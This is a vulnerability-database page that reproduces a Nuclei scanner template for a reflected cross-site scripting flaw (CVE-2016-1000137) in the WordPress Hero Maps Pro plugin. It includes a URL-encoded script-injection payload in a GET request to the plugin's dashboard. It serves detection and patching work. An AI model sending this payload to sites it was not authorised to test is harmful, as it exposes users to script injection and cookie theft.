Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000137
HistoryJul 20, 2021 - 11:12 p.m.

WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting

2021-07-2023:12:19
ProjectDiscovery
github.com
1

0.001 Low

EPSS

Percentile

50.0%

WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000137

info:
  name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=658
    - https://wordpress.org/plugins/hero-maps-pro
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000137
    cwe-id: CWE-79
    epss-score: 0.00114
    epss-percentile: 0.44874
    cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: hero-maps-pro_project
    product: hero-maps-pro
    framework: wordpress
  tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Hero Maps Pro ='

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ec25e6281060d9339067044f5110e8613194f364b3fee806ba5124a7cdca4dbf02207bbf5ebac1e11b387d6db81dcaf382b7d21f7c0b651cbbe19b4a127052c19a2b:922c64590222798bb761d5b6d8e72950

0.001 Low

EPSS

Percentile

50.0%

Related for NUCLEI:CVE-2016-1000137